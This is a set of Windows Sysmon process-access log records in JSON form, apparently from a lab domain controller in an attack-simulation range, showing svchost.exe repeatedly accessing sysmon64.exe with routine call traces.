{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
